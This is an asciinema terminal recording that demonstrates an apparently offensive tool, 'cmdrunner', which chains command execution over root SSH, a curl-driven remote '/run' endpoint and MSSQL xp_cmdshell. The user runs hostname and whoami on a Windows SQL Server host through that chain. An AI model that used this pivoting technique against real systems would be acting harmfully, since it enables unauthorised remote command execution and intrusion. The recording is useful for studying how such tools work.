{"version": 2, "width": 120, "height": 30, "timestamp": 1560184940, "idle_time_limit": 2.0, "env": {"SHELL": "/bin/bash", "TERM": "screen-256color"}}
[0.026532, "o", "\u001b[01;32muser@ubuntu\u001b[00m:\u001b[01;34m~/Projects/cmdrunner\u001b[00m$ "]
[1.245688, "o", "p"]
[1.345706, "o", "y"]
[1.501107, "o", "t"]
[1.561671, "o", "h"]
[1.656003, "o", "o"]
[1.711113, "o", "n"]
[2.026822, "o", "3"]
[2.206019, "o", " "]
[2.356236, "o", "c"]
[2.436896, "o", "m"]
[2.591199, "o", "drunner.py "]
[3.336511, "o", "\r\n"]
[3.47312, "o", "Available Runners:\r\n\tBashRunner\r\n\tEchoRunner\r\n\tWebRunner\r\nAvailable Encoders:\r\n\tCurlEncoder\r\n\tEchoEncoder\r\n\tPowerShellEncoder\r\n\tSSHEncoder\r\n\tWinCmdEncoder\r\n\tWmicEncoder\r\n\tXpCmdShellEncoder\r\n"]
[3.473322, "o", ">>> "]
[4.826656, "o", "$"]
[5.256585, "o", "p"]
[5.296804, "o", "u"]
[5.636497, "o", "s"]
[5.756345, "o", "h"]
[6.446893, "o", "\u0007_"]
[6.942028, "o", "e"]
[7.062376, "o", "ncoder "]
[9.306884, "o", "s"]
[9.461406, "o", "s"]
[9.602278, "o", "h"]
[9.737159, "o", "\b\b\bSSHEncoder"]
[10.486898, "o", " "]
[10.681759, "o", "r"]
[10.78744, "o", "o"]
[10.887263, "o", "o"]
[11.012121, "o", "t"]
[11.131999, "o", " "]
[11.457223, "o", "\""]
[11.987627, "o", "1"]
[13.052107, "o", "8"]
[13.172304, "o", "8"]
[13.692292, "o", "."]
[13.9273, "o", "1"]
[14.336869, "o", "6"]
[14.478965, "o", "6"]
[14.817479, "o", "."]
[15.752058, "o", "4"]
[16.042372, "o", "7"]
[16.202293, "o", "."]
[16.413082, "o", "5"]
[16.508013, "o", "0"]
[16.937874, "o", "\""]
[17.782899, "o", "\r\n"]
[17.798573, "o", "SSHEncoder\r\n\tusername: root\r\n\thost: 188.166.47.50\r\n\tidentity: None\r\n"]
[17.798987, "o", ">>> "]
[19.202806, "o", "h"]
[19.287476, "o", "o"]
[19.367512, "o", "s"]
[19.432868, "o", "t"]
[19.742634, "o", "n"]
[19.857529, "o", "a"]
[19.998272, "o", "m"]
[20.137874, "o", "e"]
[20.557967, "o", "\r\n"]
[21.763906, "o", "<<< ubuntu-s-1vcpu-1gb-ams3-01\r\n"]
[21.764275, "o", ">>> "]
[23.14255, "o", "$"]
[23.722831, "o", "p"]
[23.767421, "o", "u"]
[24.002647, "o", "s"]
[24.093171, "o", "h"]
[24.33313, "o", " "]
[24.752526, "o", "\b\u001b[K"]
[25.047923, "o", "_"]
[25.313321, "o", "e"]
[25.48393, "o", "ncoder "]
[26.468296, "o", "c"]
[26.581955, "o", "u"]
[26.763199, "o", "r"]
[26.888762, "o", "l"]
[27.023779, "o", "\b\b\b\bCurlEncoder"]
[27.558381, "o", " "]
[27.680795, "o", "-"]
[27.78887, "o", "-"]
[28.107819, "o", "u"]
[28.258724, "o", "r"]
[28.374449, "o", "l"]
[28.524844, "o", " "]
[28.694612, "o", "\""]
[29.009504, "o", "h"]
[29.204613, "o", "t"]
[29.330119, "o", "t"]
[29.559322, "o", "p"]
[30.015175, "o", ":"]
[30.254605, "o", "/"]
[30.36469, "o", "/"]
[31.164606, "o", "1"]
[32.425384, "o", "4"]
[32.885013, "o", "2"]
[33.459509, "o", "."]
[34.014706, "o", "9"]
[34.624577, "o", "3"]
[36.194458, "o", "."]
[37.004162, "o", "2"]
[37.134406, "o", "2"]
[37.489489, "o", "7"]
[38.153503, "o", "."]
[39.33916, "o", "4"]
[39.454138, "o", "9"]
[40.034072, "o", ":"]
[40.338885, "o", "5"]
[40.524294, "o", "0"]
[40.684677, "o", "0"]
[40.918953, "o", "0"]
[41.289001, "o", "/"]
[41.599274, "o", "r"]
[41.735008, "o", "u"]
[41.899194, "o", "n"]
[42.719213, "o", "\""]
[43.094794, "o", " "]
[43.309609, "o", "-"]
[43.440135, "o", "-"]
[43.569835, "o", "d"]
[43.625085, "o", "a"]
[43.824912, "o", "t"]
[43.9404, "o", "a"]
[44.150169, "o", " "]
[44.391119, "o", "\""]
[44.625515, "o", "d"]
[44.686104, "o", "a"]
[44.886204, "o", "t"]
[44.982995, "o", "a"]
[45.246017, "o", "="]
[45.94172, "o", "*"]
[46.087314, "o", "*"]
[46.226858, "o", "*"]
[46.397306, "o", "\""]
[47.177789, "o", "\r\n"]
[47.179611, "o", "CurlEncoder\r\n\turl: http://142.93.227.49:5000/run\r\n\tdata: data=***\r\n\treplace: ***\r\n"]
[47.179996, "o", ">>> "]
[48.187554, "o", "S"]
[48.252048, "o", "E"]
[48.522258, "o", "L"]
[48.607485, "o", "E"]
[48.788127, "o", "C"]
[49.022529, "o", "T"]
[49.252666, "o", " "]
[49.38822, "o", "1"]
[49.802747, "o", ";"]
[50.267786, "o", "\r\n"]
[51.47396, "o", "<<< 1\r\n"]
[51.474076, "o", ">>> "]
[54.057126, "o", "$"]
[54.807179, "o", "p"]
[54.857315, "o", "u"]
[55.06233, "o", "s"]
[55.12293, "o", "h"]
[55.622554, "o", "_"]
[56.123595, "o", "e"]
[56.209121, "o", "n"]
[56.393392, "o", "c"]
[56.52405, "o", "o"]
[56.719025, "o", "d"]
[56.904214, "o", "e"]
[56.958519, "o", "r"]
[57.421102, "o", " "]
[57.673863, "o", "x"]
[57.753656, "o", "p"]
[57.919915, "o", "\b\bXpCmdShellEncoder"]
[59.008785, "o", "\r\n"]
[59.00975, "o", "XpCmdShellEncoder\r\n"]
[59.00998, "o", ">>> "]
[60.178886, "o", "h"]
[60.238696, "o", "o"]
[60.648538, "o", "s"]
[60.694146, "o", "t"]
[61.118728, "o", "n"]
[61.218936, "o", "a"]
[61.353649, "o", "m"]
[61.453611, "o", "e"]
[61.729035, "o", "\r\n"]
[62.935338, "o", "<<< WIN-HJ36TEQMDF9\r\n"]
[62.93576, "o", ">>> "]
[63.778403, "o", "w"]
[63.843952, "o", "h"]
[63.918432, "o", "o"]
[64.133847, "o", "a"]
[64.258642, "o", "m"]
[64.373893, "o", "i"]
[64.678741, "o", "\r\n"]
[65.884415, "o", "<<< nt service\\mssqlserver\r\n"]
[65.884554, "o", ">>> "]
[67.913419, "o", "$"]
[68.20288, "o", "s"]
[68.253448, "o", "a"]
[68.513308, "o", "v"]
[68.593386, "o", "e"]
[68.93922, "o", "_"]
[69.663458, "o", "s"]
[69.703986, "o", "e"]
[70.044579, "o", "ssion "]
[70.885293, "o", "t"]
[70.928843, "o", "e"]
[71.843919, "o", "s"]
[71.913387, "o", "t"]
[72.103516, "o", "."]
[72.364103, "o", "j"]
[72.503925, "o", "s"]
[72.599056, "o", "o"]
[72.639472, "o", "n"]
[73.454044, "o", "\r\n"]
[73.456364, "o", ">>> "]
[74.693856, "o", "$"]
[74.888872, "o", "q"]
[76.223357, "o", "\r\n"]
[76.223666, "o", "Quitting...\r\n"]
[76.266568, "o", "\u001b[01;32muser@ubuntu\u001b[00m:\u001b[01;34m~/Projects/cmdrunner\u001b[00m$ "]
[76.943632, "o", "p"]
[77.038301, "o", "y"]
[77.188593, "o", "t"]
[77.25418, "o", "h"]
[77.349877, "o", "o"]
[77.398755, "o", "n"]
[77.58885, "o", "3"]
[78.229368, "o", " "]
[78.434559, "o", "c"]
[78.509, "o", "m"]
[78.633276, "o", "drunner.py "]
[79.12379, "o", "-"]
[79.239671, "o", "-"]
[79.354622, "o", "s"]
[79.399076, "o", "e"]
[79.589303, "o", "s"]
[79.7291, "o", "s"]
[79.834525, "o", "i"]
[79.88613, "o", "o"]
[80.159536, "o", "n"]
[81.213541, "o", " "]
[81.334188, "o", "t"]
[81.390055, "o", "e"]
[81.554273, "o", "s"]
[81.634999, "o", "t"]
[81.804041, "o", "."]
[82.024209, "o", "j"]
[82.144149, "o", "s"]
[82.244523, "o", "o"]
[82.299418, "o", "n"]
[82.564999, "o", " "]
[83.074469, "o", "h"]
[83.149889, "o", "o"]
[83.234968, "o", "s"]
[83.287209, "o", "t"]
[83.43973, "o", "n"]
[83.5863, "o", "a"]
[83.675072, "o", "m"]
[83.830446, "o", "e"]
[84.295012, "o", "\r\n"]
[84.43199, "o", "Runner:\r\n\tBashRunner\r\n\t\ttimeout: 30\r\nEncoders:\r\n"]
[84.432105, "o", "[0]: \tSSHEncoder\r\n\t\tusername: root\r\n\t\thost: 188.166.47.50\r\n\t\tidentity: None\r\n[1]: \tCurlEncoder\r\n\t\turl: http://142.93.227.49:5000/run\r\n\t\tdata: data=***\r\n\t\treplace: ***\r\n[2]: \tXpCmdShellEncoder\r\n"]
[85.635689, "o", "WIN-HJ36TEQMDF9\r\n\r\n"]
[85.677818, "o", "\u001b[01;32muser@ubuntu\u001b[00m:\u001b[01;34m~/Projects/cmdrunner\u001b[00m$ "]
[87.119822, "o", "python3 cmdrunner.py --session test.json hostname"]
[87.609281, "o", "\b\u001b[K"]
[87.759825, "o", "\b\u001b[K"]
[87.880342, "o", "\b\u001b[K"]
[88.008635, "o", "\b\u001b[K"]
[88.135096, "o", "\b\u001b[K"]
[88.254737, "o", "\b\u001b[K"]
[88.390359, "o", "\b\u001b[K"]
[88.660623, "o", "\b\u001b[K"]
[88.970495, "o", "w"]
[89.114999, "o", "h"]
[89.140947, "o", "o"]
[89.410508, "o", "a"]
[89.490943, "o", "m"]
[89.575781, "o", "i"]
[90.570249, "o", "\r\n"]
[90.678161, "o", "Runner:\r\n\tBashRunner\r\n\t\ttimeout: 30\r\nEncoders:\r\n[0]: \tSSHEncoder\r\n\t\tusername: root\r\n\t\thost: 188.166.47.50\r\n\t\tidentity: None\r\n[1]: \tCurlEncoder\r\n\t\turl: http://142.93.227.49:5000/run\r\n\t\tdata: data=***\r\n\t\treplace: ***\r\n"]
[90.678334, "o", "[2]: \tXpCmdShellEncoder\r\n"]
[91.881942, "o", "nt service\\mssqlserver\r\n\r\n"]
[91.929111, "o", "\u001b[01;32muser@ubuntu\u001b[00m:\u001b[01;34m~/Projects/cmdrunner\u001b[00m$ "]
